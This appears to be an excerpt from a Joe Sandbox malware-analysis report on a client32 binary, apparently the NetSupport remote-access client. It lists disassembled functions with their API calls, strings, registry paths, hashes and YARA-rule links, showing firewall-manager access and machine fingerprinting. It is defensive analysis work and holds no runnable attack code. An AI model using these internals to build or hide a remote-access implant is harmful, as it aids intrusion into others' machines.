                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                                                                                • String ID: 3'
                                                                                                                                                                                • API String ID: 77915721-280543908
                                                                                                                                                                                • Opcode ID: 7b074c8ce2b631ca01e12c25c1b3c9c533fa6da0f9d0a3a757ba78ed7eb08c2b
                                                                                                                                                                                • Instruction ID: 20da8d95474045100c12f3eb79cc43b30f53893df18a5b88873a47d8d55c8b33
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b074c8ce2b631ca01e12c25c1b3c9c533fa6da0f9d0a3a757ba78ed7eb08c2b
                                                                                                                                                                                • Instruction Fuzzy Hash: BD21CF70B451288FDB24CF24CD88BDAB3B5AF06318F0582C5E80DA7680CA34DD84CF99
                                                                                                                                                                                Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                                                                                • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                                                • API String ID: 3222248624-258972079
                                                                                                                                                                                • Opcode ID: 25d234f057d108314d44e55763520a95b67a76f65eea56d1a5e0e5d06d1d9010
                                                                                                                                                                                • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                                                                                                                • Opcode Fuzzy Hash: 25d234f057d108314d44e55763520a95b67a76f65eea56d1a5e0e5d06d1d9010
                                                                                                                                                                                • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                                                                                                                Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11026322
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11026359
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                                                • API String ID: 4186647306-532032230
                                                                                                                                                                                • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                                                                                                • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                                                                                                                • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                                                                                                • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                                                                                                                Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110F55,11110AF0,00000001,00000000,00000000,00000001), ref: 11110057
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1111007A
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 111100A7
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 111100B1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                                • API String ID: 3360349984-1136101629
                                                                                                                                                                                • Opcode ID: bbe076d3ba031baba16d0b109a43559f1cad04285600b4ef71005418bdeb7ef0
                                                                                                                                                                                • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                                                                                                • Opcode Fuzzy Hash: bbe076d3ba031baba16d0b109a43559f1cad04285600b4ef71005418bdeb7ef0
                                                                                                                                                                                • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                                                                                                Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                • String ID: %s%s%s.bin$301389$_HF$_HW$_SW
                                                                                                                                                                                • API String ID: 2111968516-3199141679
                                                                                                                                                                                • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                                                                                                • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                                                                                                                • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                                                                                                                Function 1102A6D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsJPIK.PCICHEK(2520CF5D), ref: 1102A6F6
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _freewsprintf
                                                                                                                                                                                • String ID: IKS$Serial_no$_License$iks.lic
                                                                                                                                                                                • API String ID: 2035632046-3338670020
                                                                                                                                                                                • Opcode ID: 73a26ee8bda09dc07d74eebece7028df8bb8da5484d6399e83873dc54fc9f7d9
                                                                                                                                                                                • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 73a26ee8bda09dc07d74eebece7028df8bb8da5484d6399e83873dc54fc9f7d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                                                                                                                Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                                                                                                                • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                                                                                                                • RegisterClassA.USER32(?), ref: 111036EF
                                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                                • String ID: NSMDesktopWnd
                                                                                                                                                                                • API String ID: 2669163067-206650970
                                                                                                                                                                                • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                                                                                                • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                                                                                                • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                                                                                                                Function 1113D850 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113D8BA
                                                                                                                                                                                • KillTimer.USER32(00000000,00007F4C,TermUI...), ref: 1113D8D3
                                                                                                                                                                                • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113D94B
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113D963
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeKillLibraryTimer
                                                                                                                                                                                • String ID: TermUI
                                                                                                                                                                                • API String ID: 2006562601-4085834059
                                                                                                                                                                                • Opcode ID: 198e7198b574325a48a1303810472838150400c1ca1d77a78bd0bd13a32dcf8d
                                                                                                                                                                                • Instruction ID: 66e8793c0e05388637aa2578622d01600e7f8a0437d96931333ccb062f4b4285
                                                                                                                                                                                • Opcode Fuzzy Hash: 198e7198b574325a48a1303810472838150400c1ca1d77a78bd0bd13a32dcf8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 193184746121329BD605DB9ACDE0DAEFB6ABBD6B1C790002AE0658731CE731A444CFD1
                                                                                                                                                                                Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpen
                                                                                                                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                                • API String ID: 47109696-3245241687
                                                                                                                                                                                • Opcode ID: 1659a2171637379f6e09a396912742987d87c4a8c23853e144c66d97bf816f21
                                                                                                                                                                                • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                                                                                                • Opcode Fuzzy Hash: 1659a2171637379f6e09a396912742987d87c4a8c23853e144c66d97bf816f21
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                                                                                                Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                                                                                                                  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                                                                                                                  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                                • API String ID: 806825551-1858614750
                                                                                                                                                                                • Opcode ID: 6a37f5c6de0707657cca51184e57abc0e0db0d6ba7443d5807ac6c2e6ca36850
                                                                                                                                                                                • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a37f5c6de0707657cca51184e57abc0e0db0d6ba7443d5807ac6c2e6ca36850
                                                                                                                                                                                • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                                                                                                                Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
